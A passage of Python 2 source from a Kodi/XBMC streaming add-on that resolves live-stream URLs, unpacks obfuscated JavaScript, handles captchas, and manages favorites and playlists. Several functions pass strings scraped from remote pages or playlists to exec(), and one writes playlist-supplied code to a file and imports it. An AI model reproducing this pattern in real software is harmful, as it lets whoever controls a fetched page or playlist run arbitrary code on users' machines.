  1640. final_url = re_me(page_data, '&ver_t=([^&]+)&') + '?wmsAuthSign=' + re_me(page_data, 'wmsAuthSign%3D([^%&]+)') + '==/mp4:' + re_me(page_data, '\\?y=([^&]+)&')
  1641. else:
  1642. final_url = re_me(page_data, 'href="([^"]+)"[^"]+$')
  1643. if len(final_url)==0:
  1644. final_url=page_data
  1645. final_url = final_url.replace(' ', '%20')
  1646. return final_url
  1647.  
  1648. def re_me(data, re_patten):
  1649. match = ''
  1650. m = re.search(re_patten, data)
  1651. if m != None:
  1652. match = m.group(1)
  1653. else:
  1654. match = ''
  1655. return match
  1656.  
  1657. def revist_dag(page_data):
  1658. final_url = ''
  1659. if '127.0.0.1' in page_data:
  1660. final_url = re_me(page_data, '&ver_t=([^&]+)&') + ' live=true timeout=15 playpath=' + re_me(page_data, '\\?y=([a-zA-Z0-9-_\\.@]+)')
  1661.  
  1662. if re_me(page_data, 'token=([^&]+)&') != '':
  1663. final_url = final_url + '?token=' + re_me(page_data, 'token=([^&]+)&')
  1664. elif re_me(page_data, 'wmsAuthSign%3D([^%&]+)') != '':
  1665. final_url = re_me(page_data, '&ver_t=([^&]+)&') + '?wmsAuthSign=' + re_me(page_data, 'wmsAuthSign%3D([^%&]+)') + '==/mp4:' + re_me(page_data, '\\?y=([^&]+)&')
  1666. else:
  1667. final_url = re_me(page_data, 'HREF="([^"]+)"')
  1668.  
  1669. if 'dag1.asx' in final_url:
  1670. return get_dag_url(final_url)
  1671.  
  1672. if 'devinlivefs.fplive.net' not in final_url:
  1673. final_url = final_url.replace('devinlive', 'flive')
  1674. if 'permlivefs.fplive.net' not in final_url:
  1675. final_url = final_url.replace('permlive', 'flive')
  1676. return final_url
  1677.  
  1678.  
  1679. def get_unwise( str_eval):
  1680. page_value=""
  1681. try:
  1682. ss="w,i,s,e=("+str_eval+')'
  1683. exec (ss)
  1684. page_value=unwise_func(w,i,s,e)
  1685. except: traceback.print_exc(file=sys.stdout)
  1686. #print 'unpacked',page_value
  1687. return page_value
  1688.  
  1689. def unwise_func( w, i, s, e):
  1690. lIll = 0;
  1691. ll1I = 0;
  1692. Il1l = 0;
  1693. ll1l = [];
  1694. l1lI = [];
  1695. while True:
  1696. if (lIll < 5):
  1697. l1lI.append(w[lIll])
  1698. elif (lIll < len(w)):
  1699. ll1l.append(w[lIll]);
  1700. lIll+=1;
  1701. if (ll1I < 5):
  1702. l1lI.append(i[ll1I])
  1703. elif (ll1I < len(i)):
  1704. ll1l.append(i[ll1I])
  1705. ll1I+=1;
  1706. if (Il1l < 5):
  1707. l1lI.append(s[Il1l])
  1708. elif (Il1l < len(s)):
  1709. ll1l.append(s[Il1l]);
  1710. Il1l+=1;
  1711. if (len(w) + len(i) + len(s) + len(e) == len(ll1l) + len(l1lI) + len(e)):
  1712. break;
  1713.  
  1714. lI1l = ''.join(ll1l)#.join('');
  1715. I1lI = ''.join(l1lI)#.join('');
  1716. ll1I = 0;
  1717. l1ll = [];
  1718. for lIll in range(0,len(ll1l),2):
  1719. #print 'array i',lIll,len(ll1l)
  1720. ll11 = -1;
  1721. if ( ord(I1lI[ll1I]) % 2):
  1722. ll11 = 1;
  1723. #print 'val is ', lI1l[lIll: lIll+2]
  1724. l1ll.append(chr( int(lI1l[lIll: lIll+2], 36) - ll11));
  1725. ll1I+=1;
  1726. if (ll1I >= len(l1lI)):
  1727. ll1I = 0;
  1728. ret=''.join(l1ll)
  1729. if 'eval(function(w,i,s,e)' in ret:
  1730. # print 'STILL GOing'
  1731. ret=re.compile('eval\(function\(w,i,s,e\).*}\((.*?)\)').findall(ret)[0]
  1732. return get_unwise(ret)
  1733. else:
  1734. # print 'FINISHED'
  1735. return ret
  1736.  
  1737. def get_unpacked( page_value, regex_for_text='', iterations=1, total_iteration=1):
  1738. try:
  1739. reg_data=None
  1740. if page_value.startswith("http"):
  1741. page_value= getUrl(page_value)
  1742. # print 'page_value',page_value
  1743. if regex_for_text and len(regex_for_text)>0:
  1744. try:
  1745. page_value=re.compile(regex_for_text).findall(page_value)[0] #get the js variable
  1746. except: return 'NOTPACKED'
  1747.  
  1748. page_value=unpack(page_value,iterations,total_iteration)
  1749. except:
  1750. page_value='UNPACKEDFAILED'
  1751. traceback.print_exc(file=sys.stdout)
  1752. # print 'unpacked',page_value
  1753. if 'sav1live.tv' in page_value:
  1754. page_value=page_value.replace('sav1live.tv','sawlive.tv') #quick fix some bug somewhere
  1755. # print 'sav1 unpacked',page_value
  1756. return page_value
  1757.  
  1758. def unpack(sJavascript,iteration=1, totaliterations=2 ):
  1759. # print 'iteration',iteration
  1760. if sJavascript.startswith('var _0xcb8a='):
  1761. aSplit=sJavascript.split('var _0xcb8a=')
  1762. ss="myarray="+aSplit[1].split("eval(")[0]
  1763. exec(ss)
  1764. a1=62
  1765. c1=int(aSplit[1].split(",62,")[1].split(',')[0])
  1766. p1=myarray[0]
  1767. k1=myarray[3]
  1768. with open('temp file'+str(iteration)+'.js', "wb") as filewriter:
  1769. filewriter.write(str(k1))
  1770. #aa=1/0
  1771. else:
  1772.  
  1773. if "rn p}('" in sJavascript:
  1774. aSplit = sJavascript.split("rn p}('")
  1775. else:
  1776. aSplit = sJavascript.split("rn A}('")
  1777. # print aSplit
  1778.  
  1779. p1,a1,c1,k1=('','0','0','')
  1780.  
  1781. ss="p1,a1,c1,k1=('"+aSplit[1].split(".spli")[0]+')'
  1782. exec(ss)
  1783. k1=k1.split('|')
  1784. aSplit = aSplit[1].split("))'")
  1785. # print ' p array is ',len(aSplit)
  1786. # print len(aSplit )
  1787.  
  1788. #p=str(aSplit[0]+'))')#.replace("\\","")#.replace('\\\\','\\')
  1789.  
  1790. #print aSplit[1]
  1791. #aSplit = aSplit[1].split(",")
  1792. #print aSplit[0]
  1793. #a = int(aSplit[1])
  1794. #c = int(aSplit[2])
  1795. #k = aSplit[3].split(".")[0].replace("'", '').split('|')
  1796. #a=int(a)
  1797. #c=int(c)
  1798.  
  1799. #p=p.replace('\\', '')
  1800. # print 'p val is ',p[0:100],'............',p[-100:],len(p)
  1801. # print 'p1 val is ',p1[0:100],'............',p1[-100:],len(p1)
  1802.  
  1803. #print a,a1
  1804. #print c,a1
  1805. #print 'k val is ',k[-10:],len(k)
  1806. # print 'k1 val is ',k1[-10:],len(k1)
  1807. e = ''
  1808. d = ''#32823
  1809.  
  1810. #sUnpacked = str(__unpack(p, a, c, k, e, d))
  1811. sUnpacked1 = str(__unpack(p1, a1, c1, k1, e, d,iteration))
  1812.  
  1813. #print sUnpacked[:200]+'....'+sUnpacked[-100:], len(sUnpacked)
  1814. # print sUnpacked1[:200]+'....'+sUnpacked1[-100:], len(sUnpacked1)
  1815.  
  1816. #exec('sUnpacked1="'+sUnpacked1+'"')
  1817. if iteration>=totaliterations:
  1818. # print 'final res',sUnpacked1[:200]+'....'+sUnpacked1[-100:], len(sUnpacked1)
  1819. return sUnpacked1#.replace('\\\\', '\\')
  1820. else:
  1821. # print 'final res for this iteration is',iteration
  1822. return unpack(sUnpacked1,iteration+1)#.replace('\\', ''),iteration)#.replace('\\', '');#unpack(sUnpacked.replace('\\', ''))
  1823.  
  1824. def __unpack(p, a, c, k, e, d, iteration,v=1):
  1825.  
  1826. #with open('before file'+str(iteration)+'.js', "wb") as filewriter:
  1827. # filewriter.write(str(p))
  1828. while (c >= 1):
  1829. c = c -1
  1830. if (k[c]):
  1831. aa=str(__itoaNew(c, a))
  1832. if v==1:
  1833. p=re.sub('\\b' + aa +'\\b', k[c], p)# THIS IS Bloody slow!
  1834. else:
  1835. p=findAndReplaceWord(p,aa,k[c])
  1836.  
  1837. #p=findAndReplaceWord(p,aa,k[c])
  1838.  
  1839.  
  1840. #with open('after file'+str(iteration)+'.js', "wb") as filewriter:
  1841. # filewriter.write(str(p))
  1842. return p
  1843.  
  1844. #
  1845. #function equalavent to re.sub('\\b' + aa +'\\b', k[c], p)
  1846. def findAndReplaceWord(source_str, word_to_find,replace_with):
  1847. splits=None
  1848. splits=source_str.split(word_to_find)
  1849. if len(splits)>1:
  1850. new_string=[]
  1851. current_index=0
  1852. for current_split in splits:
  1853. #print 'here',i
  1854. new_string.append(current_split)
  1855. val=word_to_find#by default assume it was wrong to split
  1856.  
  1857. #if its first one and item is blank then check next item is valid or not
  1858. if current_index==len(splits)-1:
  1859. val='' # last one nothing to append normally
  1860. else:
  1861. if len(current_split)==0: #if blank check next one with current split value
  1862. if ( len(splits[current_index+1])==0 and word_to_find[0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') or (len(splits[current_index+1])>0 and splits[current_index+1][0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_'):# first just just check next
  1863. val=replace_with
  1864. #not blank, then check current endvalue and next first value
  1865. else:
  1866. if (splits[current_index][-1].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') and (( len(splits[current_index+1])==0 and word_to_find[0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') or (len(splits[current_index+1])>0 and splits[current_index+1][0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_')):# first just just check next
  1867. val=replace_with
  1868.  
  1869. new_string.append(val)
  1870. current_index+=1
  1871. #aaaa=1/0
  1872. source_str=''.join(new_string)
  1873. return source_str
  1874.  
  1875. def __itoa(num, radix):
  1876. # print 'num red',num, radix
  1877. result = ""
  1878. if num==0: return '0'
  1879. while num > 0:
  1880. result = "0123456789abcdefghijklmnopqrstuvwxyz"[num % radix] + result
  1881. num /= radix
  1882. return result
  1883.  
  1884. def __itoaNew(cc, a):
  1885. aa="" if cc < a else __itoaNew(int(cc / a),a)
  1886. cc = (cc % a)
  1887. bb=chr(cc + 29) if cc> 35 else str(__itoa(cc,36))
  1888. return aa+bb
  1889.  
  1890.  
  1891. def getCookiesString(cookieJar):
  1892. try:
  1893. cookieString=""
  1894. for index, cookie in enumerate(cookieJar):
  1895. cookieString+=cookie.name + "=" + cookie.value +";"
  1896. except: pass
  1897. #print 'cookieString',cookieString
  1898. return cookieString
  1899.  
  1900.  
  1901. def saveCookieJar(cookieJar,COOKIEFILE):
  1902. try:
  1903. complete_path=os.path.join(profile,COOKIEFILE)
  1904. cookieJar.save(complete_path,ignore_discard=True)
  1905. except: pass
  1906.  
  1907. def getCookieJar(COOKIEFILE):
  1908.  
  1909. cookieJar=None
  1910. if COOKIEFILE:
  1911. try:
  1912. complete_path=os.path.join(profile,COOKIEFILE)
  1913. cookieJar = cookielib.LWPCookieJar()
  1914. cookieJar.load(complete_path,ignore_discard=True)
  1915. except:
  1916. cookieJar=None
  1917.  
  1918. if not cookieJar:
  1919. cookieJar = cookielib.LWPCookieJar()
  1920.  
  1921. return cookieJar
  1922.  
  1923. def doEval(fun_call,page_data,Cookie_Jar,m):
  1924. ret_val=''
  1925. #print fun_call
  1926. if functions_dir not in sys.path:
  1927. sys.path.append(functions_dir)
  1928.  
  1929. # print fun_call
  1930. try:
  1931. py_file='import '+fun_call.split('.')[0]
  1932. # print py_file,sys.path
  1933. exec( py_file)
  1934. # print 'done'
  1935. except:
  1936. #print 'error in import'
  1937. traceback.print_exc(file=sys.stdout)
  1938. # print 'ret_val='+fun_call
  1939. exec ('ret_val='+fun_call)
  1940. # print ret_val
  1941. #exec('ret_val=1+1')
  1942. try:
  1943. return str(ret_val)
  1944. except: return ret_val
  1945.  
  1946. def doEvalFunction(fun_call,page_data,Cookie_Jar,m):
  1947. # print 'doEvalFunction'
  1948. try:
  1949. global gLSProDynamicCodeNumber
  1950. gLSProDynamicCodeNumber=gLSProDynamicCodeNumber+1
  1951. ret_val=''
  1952. print 'doooodoo'
  1953. if functions_dir not in sys.path:
  1954. sys.path.append(functions_dir)
  1955.  
  1956. filename='LSProdynamicCode%s.py'%str(gLSProDynamicCodeNumber)
  1957. filenamewithpath=os.path.join(functions_dir,filename)
  1958. f=open(filenamewithpath,"wb")
  1959. f.write("# -*- coding: utf-8 -*-\n")
  1960. f.write(fun_call.encode("utf-8"));
  1961. f.close()
  1962. print 'before do'
  1963. LSProdynamicCode = import_by_string(filename.split('.')[0],filenamewithpath)
  1964. print 'after'
  1965.  
  1966. ret_val=LSProdynamicCode.GetLSProData(page_data,Cookie_Jar,m)
  1967. try:
  1968. return str(ret_val)
  1969. except: return ret_val
  1970. except: traceback.print_exc()
  1971. return ""
  1972.  
  1973. def import_by_string(full_name,filenamewithpath):
  1974. try:
  1975.  
  1976. import importlib
  1977. return importlib.import_module(full_name, package=None)
  1978. except:
  1979. import imp
  1980. return imp.load_source(full_name,filenamewithpath)
  1981.  
  1982.  
  1983. def getGoogleRecaptchaResponse(captchakey, cj,type=1): #1 for get, 2 for post, 3 for rawpost
  1984. # #headers=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')]
  1985. # html_text=getUrl(url,noredir=True, cookieJar=cj,headers=headers)
  1986. # print 'html_text',html_text
  1987. recapChallenge=""
  1988. solution=""
  1989. # cap_reg="recap.*?\?k=(.*?)\""
  1990. # match =re.findall(cap_reg, html_text)
  1991.  
  1992.  
  1993. # print 'match',match
  1994. captcha=False
  1995. captcha_reload_response_chall=None
  1996. solution=None
  1997. if len(captchakey)>0: #new shiny captcha!
  1998. captcha_url=captchakey
  1999. if not captcha_url.startswith('http'):
  2000. captcha_url='http://www.google.com/recaptcha/api/challenge?k='+captcha_url+'&ajax=1'
  2001. # print 'captcha_url',captcha_url
  2002. captcha=True
  2003.  
  2004. cap_chall_reg='challenge.*?\'(.*?)\''
  2005. cap_image_reg='\'(.*?)\''
  2006. captcha_script=getUrl(captcha_url,cookieJar=cj)
  2007. recapChallenge=re.findall(cap_chall_reg, captcha_script)[0]
  2008. captcha_reload='http://www.google.com/recaptcha/api/reload?c=';
  2009. captcha_k=captcha_url.split('k=')[1]
  2010. captcha_reload+=recapChallenge+'&k='+captcha_k+'&reason=i&type=image&lang=en'
  2011. captcha_reload_js=getUrl(captcha_reload,cookieJar=cj)
  2012. captcha_reload_response_chall=re.findall(cap_image_reg, captcha_reload_js)[0]
  2013. captcha_image_url='http://www.google.com/recaptcha/api/image?c='+captcha_reload_response_chall
  2014. if not captcha_image_url.startswith("http"):
  2015. captcha_image_url='http://www.google.com/recaptcha/api/'+captcha_image_url
  2016. import random
  2017. n=random.randrange(100,1000,5)
  2018. local_captcha = os.path.join(profile,str(n) +"captcha.img" )
  2019. localFile = open(local_captcha, "wb")
  2020. localFile.write(getUrl(captcha_image_url,cookieJar=cj))
  2021. localFile.close()
  2022. solver = InputWindow(captcha=local_captcha)
  2023. solution = solver.get()
  2024. os.remove(local_captcha)
  2025.  
  2026. if captcha_reload_response_chall:
  2027. if type==1:
  2028. return 'recaptcha_challenge_field='+urllib.quote_plus(captcha_reload_response_chall)+'&recaptcha_response_field='+urllib.quote_plus(solution)
  2029. elif type==2:
  2030. return 'recaptcha_challenge_field:'+captcha_reload_response_chall+',recaptcha_response_field:'+solution
  2031. else:
  2032. return 'recaptcha_challenge_field='+urllib.quote_plus(captcha_reload_response_chall)+'&recaptcha_response_field='+urllib.quote_plus(solution)
  2033. else:
  2034. return ''
  2035.  
  2036.  
  2037. def getUrl(url, cookieJar=None,post=None, timeout=20, headers=None, noredir=False):
  2038.  
  2039.  
  2040. cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2041.  
  2042. if noredir:
  2043. opener = urllib2.build_opener(NoRedirection,cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2044. else:
  2045. opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2046. #opener = urllib2.install_opener(opener)
  2047. req = urllib2.Request(url)
  2048. req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
  2049. if headers:
  2050. for h,hv in headers:
  2051. req.add_header(h,hv)
  2052.  
  2053. response = opener.open(req,post,timeout=timeout)
  2054. link=response.read()
  2055. response.close()
  2056. return link;
  2057.  
  2058. def get_decode(str,reg=None):
  2059. if reg:
  2060. str=re.findall(reg, str)[0]
  2061. s1 = urllib.unquote(str[0: len(str)-1]);
  2062. t = '';
  2063. for i in range( len(s1)):
  2064. t += chr(ord(s1[i]) - s1[len(s1)-1]);
  2065. t=urllib.unquote(t)
  2066. # print t
  2067. return t
  2068.  
  2069. def javascriptUnEscape(str):
  2070. js=re.findall('unescape\(\'(.*?)\'',str)
  2071. # print 'js',js
  2072. if (not js==None) and len(js)>0:
  2073. for j in js:
  2074. #print urllib.unquote(j)
  2075. str=str.replace(j ,urllib.unquote(j))
  2076. return str
  2077.  
  2078. iid=0
  2079. def askCaptcha(m,html_page, cookieJar):
  2080. global iid
  2081. iid+=1
  2082. expre= m['expres']
  2083. page_url = m['page']
  2084. captcha_regex=re.compile('\$LiveStreamCaptcha\[([^\]]*)\]').findall(expre)[0]
  2085.  
  2086. captcha_url=re.compile(captcha_regex).findall(html_page)[0]
  2087. # print expre,captcha_regex,captcha_url
  2088. if not captcha_url.startswith("http"):
  2089. page_='http://'+"".join(page_url.split('/')[2:3])
  2090. if captcha_url.startswith("/"):
  2091. captcha_url=page_+captcha_url
  2092. else:
  2093. captcha_url=page_+'/'+captcha_url
  2094.  
  2095. local_captcha = os.path.join(profile, str(iid)+"captcha.jpg" )
  2096. localFile = open(local_captcha, "wb")
  2097. # print ' c capurl',captcha_url
  2098. req = urllib2.Request(captcha_url)
  2099. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
  2100. if 'referer' in m:
  2101. req.add_header('Referer', m['referer'])
  2102. if 'agent' in m:
  2103. req.add_header('User-agent', m['agent'])
  2104. if 'setcookie' in m:
  2105. # print 'adding cookie',m['setcookie']
  2106. req.add_header('Cookie', m['setcookie'])
  2107.  
  2108. #cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2109. #opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2110. #opener = urllib2.install_opener(opener)
  2111. urllib2.urlopen(req)
  2112. response = urllib2.urlopen(req)
  2113.  
  2114. localFile.write(response.read())
  2115. response.close()
  2116. localFile.close()
  2117. solver = InputWindow(captcha=local_captcha)
  2118. solution = solver.get()
  2119. return solution
  2120.  
  2121. def askCaptchaNew(imageregex,html_page,cookieJar,m):
  2122. global iid
  2123. iid+=1
  2124.  
  2125.  
  2126. if not imageregex=='':
  2127. if html_page.startswith("http"):
  2128. page_=getUrl(html_page,cookieJar=cookieJar)
  2129. else:
  2130. page_=html_page
  2131. captcha_url=re.compile(imageregex).findall(html_page)[0]
  2132. else:
  2133. captcha_url=html_page
  2134. if 'oneplay.tv/embed' in html_page:
  2135. import oneplay
  2136. page_=getUrl(html_page,cookieJar=cookieJar)
  2137. captcha_url=oneplay.getCaptchaUrl(page_)
  2138.  
  2139. local_captcha = os.path.join(profile, str(iid)+"captcha.jpg" )
  2140. localFile = open(local_captcha, "wb")
  2141. # print ' c capurl',captcha_url
  2142. req = urllib2.Request(captcha_url)
  2143. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
  2144. if 'referer' in m:
  2145. req.add_header('Referer', m['referer'])
  2146. if 'agent' in m:
  2147. req.add_header('User-agent', m['agent'])
  2148. if 'accept' in m:
  2149. req.add_header('Accept', m['accept'])
  2150. if 'setcookie' in m:
  2151. # print 'adding cookie',m['setcookie']
  2152. req.add_header('Cookie', m['setcookie'])
  2153.  
  2154. #cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2155. #opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2156. #opener = urllib2.install_opener(opener)
  2157. #urllib2.urlopen(req)
  2158. response = urllib2.urlopen(req)
  2159.  
  2160. localFile.write(response.read())
  2161. response.close()
  2162. localFile.close()
  2163. solver = InputWindow(captcha=local_captcha)
  2164. solution = solver.get()
  2165. return solution
  2166.  
  2167. #########################################################
  2168. # Function : GUIEditExportName #
  2169. #########################################################
  2170. # Parameter : #
  2171. # #
  2172. # name sugested name for export #
  2173. # #
  2174. # Returns : #
  2175. # #
  2176. # name name of export excluding any extension #
  2177. # #
  2178. #########################################################
  2179. def TakeInput(name, headname):
  2180.  
  2181.  
  2182. kb = xbmc.Keyboard('default', 'heading', True)
  2183. kb.setDefault(name)
  2184. kb.setHeading(headname)
  2185. kb.setHiddenInput(False)
  2186. return kb.getText()
  2187.  
  2188.  
  2189. #########################################################
  2190.  
  2191. class InputWindow(xbmcgui.WindowDialog):
  2192. def __init__(self, *args, **kwargs):
  2193. self.cptloc = kwargs.get('captcha')
  2194. self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
  2195. self.addControl(self.img)
  2196. self.kbd = xbmc.Keyboard()
  2197.  
  2198. def get(self):
  2199. self.show()
  2200. time.sleep(2)
  2201. self.kbd.doModal()
  2202. if (self.kbd.isConfirmed()):
  2203. text = self.kbd.getText()
  2204. self.close()
  2205. return text
  2206. self.close()
  2207. return False
  2208.  
  2209. def getEpocTime():
  2210. import time
  2211. return str(int(time.time()*1000))
  2212.  
  2213. def getEpocTime2():
  2214. import time
  2215. return str(int(time.time()))
  2216.  
  2217. def get_params():
  2218. param=[]
  2219. paramstring=sys.argv[2]
  2220. if len(paramstring)>=2:
  2221. params=sys.argv[2]
  2222. cleanedparams=params.replace('?','')
  2223. if (params[len(params)-1]=='/'):
  2224. params=params[0:len(params)-2]
  2225. pairsofparams=cleanedparams.split('&')
  2226. param={}
  2227. for i in range(len(pairsofparams)):
  2228. splitparams={}
  2229. splitparams=pairsofparams[i].split('=')
  2230. if (len(splitparams))==2:
  2231. param[splitparams[0]]=splitparams[1]
  2232. return param
  2233.  
  2234.  
  2235. def getFavorites():
  2236. items = json.loads(open(favorites).read())
  2237. total = len(items)
  2238. for i in items:
  2239. name = i[0]
  2240. url = i[1]
  2241. iconimage = i[2]
  2242. try:
  2243. fanArt = i[3]
  2244. if fanArt == None:
  2245. raise
  2246. except:
  2247. if addon.getSetting('use_thumb') == "true":
  2248. fanArt = iconimage
  2249. else:
  2250. fanArt = fanart
  2251. try: playlist = i[5]
  2252. except: playlist = None
  2253. try: regexs = i[6]
  2254. except: regexs = None
  2255.  
  2256. if i[4] == 0:
  2257. addLink(url,name,iconimage,fanArt,'','','','fav',playlist,regexs,total)
  2258. else:
  2259. addDir(name,url,i[4],iconimage,fanart,'','','','','fav')
  2260.  
  2261.  
  2262. def addFavorite(name,url,iconimage,fanart,mode,playlist=None,regexs=None):
  2263. favList = []
  2264. try:
  2265. # seems that after
  2266. name = name.encode('utf-8', 'ignore')
  2267. except:
  2268. pass
  2269. if os.path.exists(favorites)==False:
  2270. addon_log('Making Favorites File')
  2271. favList.append((name,url,iconimage,fanart,mode,playlist,regexs))
  2272. a = open(favorites, "w")
  2273. a.write(json.dumps(favList))
  2274. a.close()
  2275. else:
  2276. addon_log('Appending Favorites')
  2277. a = open(favorites).read()
  2278. data = json.loads(a)
  2279. data.append((name,url,iconimage,fanart,mode))
  2280. b = open(favorites, "w")
  2281. b.write(json.dumps(data))
  2282. b.close()
  2283.  
  2284.  
  2285. def rmFavorite(name):
  2286. data = json.loads(open(favorites).read())
  2287. for index in range(len(data)):
  2288. if data[index][0]==name:
  2289. del data[index]
  2290. b = open(favorites, "w")
  2291. b.write(json.dumps(data))
  2292. b.close()
  2293. break
  2294. xbmc.executebuiltin("XBMC.Container.Refresh")
  2295.  
  2296. def urlsolver(url):
  2297. import urlresolver
  2298. host = urlresolver.HostedMediaFile(url)
  2299. if host:
  2300. resolver = urlresolver.resolve(url)
  2301. resolved = resolver
  2302. if isinstance(resolved,list):
  2303. for k in resolved:
  2304. quality = addon.getSetting('quality')
  2305. if k['quality'] == 'HD' :
  2306. resolver = k['url']
  2307. break
  2308. elif k['quality'] == 'SD' :
  2309. resolver = k['url']
  2310. elif k['quality'] == '1080p' and addon.getSetting('1080pquality') == 'true' :
  2311. resolver = k['url']
  2312. break
  2313. else:
  2314. resolver = resolved
  2315. else:
  2316. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Urlresolver donot support this domain. - ,5000)")
  2317. resolver=url
  2318. return resolver
  2319. def tryplay(url,listitem,pdialogue=None):
  2320.  
  2321. if url.lower().startswith('plugin') and 'youtube' not in url.lower():
  2322. print 'playing via runplugin'
  2323. xbmc.executebuiltin('XBMC.RunPlugin('+url+')')
  2324. for i in range(8):
  2325. xbmc.sleep(500) ##sleep for 10 seconds, half each time
  2326. try:
  2327. #print 'condi'
  2328. if xbmc.getCondVisibility("Player.HasMedia") and xbmc.Player().isPlaying():
  2329. return True
  2330. except: pass
  2331. print 'returning now'
  2332. return False
  2333. import CustomPlayer,time
  2334.  
  2335. player = CustomPlayer.MyXBMCPlayer()
  2336. player.pdialogue=pdialogue
  2337. start = time.time()
  2338. #xbmc.Player().play( liveLink,listitem)
  2339. print 'going to play'
  2340. import time
  2341. beforestart=time.time()
  2342. player.play( url, listitem)
  2343. xbmc.sleep(1000)
  2344.  
  2345. try:
  2346. while player.is_active:
  2347. xbmc.sleep(400)
  2348.  
  2349. if player.urlplayed:
  2350. print 'yes played'
  2351. return True
  2352. if time.time()-beforestart>4: return False
  2353. #xbmc.sleep(1000)
  2354. except: pass
  2355. print 'not played',url
  2356. return False
  2357. def play_playlist(name, mu_playlist,queueVideo=None):
  2358. playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
  2359. #print 'mu_playlist',mu_playlist
  2360. if '$$LSPlayOnlyOne$$' in mu_playlist[0]:
  2361. mu_playlist[0]=mu_playlist[0].replace('$$LSPlayOnlyOne$$','')
  2362. import urlparse
  2363. names = []
  2364. iloop=0
  2365. progress = xbmcgui.DialogProgress()
  2366. progress.create('Progress', 'Trying Multiple Links')
  2367. for i in mu_playlist:
  2368.  
  2369.  
  2370. if '$$lsname=' in i:
  2371. d_name=i.split('$$lsname=')[1].split('&regexs')[0]
  2372. names.append(d_name)
  2373. mu_playlist[iloop]=i.split('$$lsname=')[0]+('&regexs'+i.split('&regexs')[1] if '&regexs' in i else '')
  2374. else:
  2375. d_name=urlparse.urlparse(i).netloc
  2376. if d_name == '':
  2377. names.append(name)
  2378. else:
  2379. names.append(d_name)
  2380. index=iloop
  2381. iloop+=1
  2382.  
  2383. playname=names[index]
  2384. if progress.iscanceled(): return
  2385. progress.update( iloop/len(mu_playlist)*100,"", "Link#%d"%(iloop),playname )
  2386. print 'auto playnamexx',playname
  2387. if "&mode=19" in mu_playlist[index]:
  2388. #playsetresolved (urlsolver(mu_playlist[index].replace('&mode=19','')),name,iconimage,True)
  2389. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2390. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2391. liz.setProperty("IsPlayable","true")
  2392. urltoplay=urlsolver(mu_playlist[index].replace('&mode=19','').replace(';',''))
  2393. liz.setPath(urltoplay)
  2394. #xbmc.Player().play(urltoplay,liz)
  2395. played=tryplay(urltoplay,liz)
  2396. elif "$doregex" in mu_playlist[index] :
  2397. # print mu_playlist[index]
  2398. sepate = mu_playlist[index].split('&regexs=')
  2399. # print sepate
  2400. url,setresolved = getRegexParsed(sepate[1], sepate[0])
  2401. url2 = url.replace(';','')
  2402. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2403. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2404. liz.setProperty("IsPlayable","true")
  2405. liz.setPath(url2)
  2406. #xbmc.Player().play(url2,liz)
  2407. played=tryplay(url2,liz)
  2408.  
  2409. else:
  2410. url = mu_playlist[index]
  2411. url=url.split('&regexs=')[0]
  2412. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2413. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2414. liz.setProperty("IsPlayable","true")
  2415. liz.setPath(url)
  2416. #xbmc.Player().play(url,liz)
  2417. played=tryplay(url,liz)
  2418. print 'played',played
  2419. print 'played',played
  2420. if played: return
  2421. return
  2422. if addon.getSetting('ask_playlist_items') == 'true' and not queueVideo :
  2423. import urlparse
  2424. names = []
  2425. iloop=0
  2426. for i in mu_playlist:
  2427. if '$$lsname=' in i:
  2428. d_name=i.split('$$lsname=')[1].split('&regexs')[0]
  2429. names.append(d_name)
  2430. mu_playlist[iloop]=i.split('$$lsname=')[0]+('&regexs'+i.split('&regexs')[1] if '&regexs' in i else '')
  2431. else:
  2432. d_name=urlparse.urlparse(i).netloc
  2433. if d_name == '':
  2434. names.append(name)
  2435. else:
  2436. names.append(d_name)
  2437.  
  2438. iloop+=1
  2439. dialog = xbmcgui.Dialog()
  2440. index = dialog.select('Choose a video source', names)
  2441. if index >= 0:
  2442. playname=names[index]
  2443. print 'playnamexx',playname
  2444. if "&mode=19" in mu_playlist[index]:
  2445. #playsetresolved (urlsolver(mu_playlist[index].replace('&mode=19','')),name,iconimage,True)
  2446. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2447. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2448. liz.setProperty("IsPlayable","true")
  2449. urltoplay=urlsolver(mu_playlist[index].replace('&mode=19','').replace(';',''))
  2450. liz.setPath(urltoplay)
  2451. xbmc.Player().play(urltoplay,liz)
  2452. elif "$doregex" in mu_playlist[index] :
  2453. # print mu_playlist[index]
  2454. sepate = mu_playlist[index].split('&regexs=')
  2455. # print sepate
  2456. url,setresolved = getRegexParsed(sepate[1], sepate[0])
